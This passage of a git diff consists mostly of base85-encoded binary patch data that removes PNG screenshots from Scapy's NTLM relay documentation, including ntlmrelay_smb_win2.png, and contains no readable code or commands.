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 diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_smb_win2.png b/doc/scapy/graphics/ntlm/ntlmrelay_smb_win2.png deleted file mode 100644 index eb2e7e759d324106fbd9abb7e37bbfaa4aefe748..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 60780 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 